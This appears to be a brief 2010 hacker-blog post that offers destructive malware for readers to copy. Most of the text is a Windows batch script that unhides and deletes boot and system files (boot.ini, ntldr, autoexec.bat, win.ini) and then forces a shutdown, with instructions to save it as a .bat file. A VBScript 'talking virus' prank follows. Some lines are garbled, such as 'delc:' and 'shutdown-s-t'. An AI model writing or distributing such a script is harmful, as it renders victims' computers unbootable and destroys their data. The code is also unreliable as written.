hackers Search

Tuesday, April 6, 2010

CREATE A VIRUS TO FORMAT A PC

@echo off
msg * KAPIL HACKER*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
delc:\windows\win.ini
@echo off
msg *computer over.virus=very*
shutdown-s-t 10 -c " "


copy and paste the codings in bat extension
eg-virus.bat

TALKING VIRUS


StrText="MY NAME IS KAPIL U CANT STOP ME hehehehehehehe"
set ObjVoice=CreateObject("SAPI.Sp Voice")
ObjVoice.Speak StrText

in ("SAPI.Sp Voice")u have to drag the voice and save it in any name
eg-talking virus.vbs extension must me in vbs

KAPIL HACKER